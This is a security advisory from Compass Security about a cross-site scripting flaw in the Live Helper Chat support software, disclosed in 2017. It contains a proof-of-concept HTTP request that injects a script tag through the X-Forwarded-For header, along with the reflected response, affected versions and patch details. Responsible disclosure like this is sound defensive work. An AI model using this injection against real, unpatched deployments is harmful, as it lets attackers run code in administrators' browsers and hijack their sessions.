Live Helper Chat - Cross-Site Scripting

############################################################
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#############################################################
#
# CSNC ID: CSNC-2017-004
# Product: Live Helper Chat [1]
# Vendor:  Live Helper Chat
# Subject: Cross-Site Scripting - XSS
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Sylvain Heiniger (sylvain.heiniger@compass-security.com)
# Date:    April 24, 2017
#
#############################################################


Introduction:
----------------
Live Helper Chat is a live chat support for websites. It provides a simple
solution for companies to get in contact with visitors of their websites. [1]

Compass Security discovered a web application security flaw in the Live
Helper Chat application which allows an attacker to execute JavaScript code in
the browser of a user. This allows, for instance, attacking the user's browser
or redirecting the user to a phishing website. The attack will be in some cases
automatically run in the backend operator's session. Otherwise, one can send
the victim a link to the website with the malicious payload.


Affected Versions:
-----------------------
The following Live Helper Chat versions are vulnerable:
- 2.06v - 2.58v [2]


Patches:
-----------
Live Helper Chat released a patch as part of release 2.60v [3, 4].


Technical Description:
-----------------------------
Live Helper Chat detects the visitor's IP address. To this end, it reads the
"X-Forwarded-For" HTTP header. Any visitor can inject a <script> tag in this
header. It will be reflected in the administrator's "online users" information
page as well as in the "print chat" page.

User's request:
===============
POST /lhc_web/index.php/chat/chatwidget/(vid)/47428qicplsqmfe9huq2/(leaveamessage)/true HTTP/1.1
Host: localhost
X-Forwarded-For: <script>alert(1);</script>
Connection: close
Content-Length: 188

Username=Example&Question=My+question&user_timezone=2&URLRefer=%2F%2Flocalhost%2F&r=&operator=0&StartChat=1&captcha_1977271e431742414c31477d258028664d713ae0=1475518554&tscaptcha=1475518554
===============

Subsequent request to the online users page /lhc_web/index.php/site_admin/chat/onlineusers/(method)/ajax/(timeout)/3600/(maxrows)/50 will be responded with:
===============
[{"id":"1","ip":"<script>alert(1);<\/script>","vid":"47428qicplsqmfe9huq2", [JSON MESSAGE CUT]
===============

Note: the above JSON response is sent by the application with the content-type text/html,
making it vulnerable to XSS as is.


Milestones:
---------------
2017-03-14: Vulnerability discovered
2017-04-23: Vendor notified
2017-04-23: Vendor provided patched version
2017-04-28: Public disclosure


References:
---------------
[1] https://github.com/LiveHelperChat/livehelperchat/
[2] https://github.com/LiveHelperChat/livehelperchat/commit/f93d092c634f52098d578883ef8d069313d460ec
[3] https://livehelperchat.com/new-version-2.60v-security-update-460a.html
[4] https://github.com/LiveHelperChat/livehelperchat/commit/eee03f77f3f51fed613c5e306152ea60255edba2